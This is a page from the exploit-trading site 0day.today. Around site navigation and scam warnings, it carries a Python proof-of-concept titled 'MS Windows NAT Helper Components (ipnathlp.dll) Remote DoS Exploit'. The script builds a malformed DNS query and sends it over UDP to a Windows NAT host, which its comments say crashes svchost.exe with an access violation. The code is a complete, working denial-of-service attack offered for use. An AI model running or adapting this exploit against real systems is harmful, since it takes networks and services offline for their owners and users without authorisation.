0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit
================================================================== MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit ================================================================== #!/usr/bin/python # Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit # Bug discovered by h07 <h07@interia.pl> # Tested on XP SP2 Polish # Details: # # Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] # # [Process svchost.exe, module ipnathlp] # --> MOV DL, [EAX] # Exception C0000005 (ACCESS_VIOLATION reading [00000000]) ## from socket import * from time import sleep host = "192.168.0.1" port = 53 buffer = ( # DNS (query) "\x6c\xb6" # Transaction ID: 0x6cb6 "\x01\x00" # Flags: 0x0100 (Standard query) "\x00\x00" # Questions: 0 "\x00\x00" # Answer RRs: 0 "\x00\x00" # Authority RRs: 0 "\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: www.google.com "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) ) s = socket(AF_INET, SOCK_DGRAM) s.connect((host, port)) s.send(buffer) sleep(1) s.close() # EoF # 0day.today [2024-06-30] #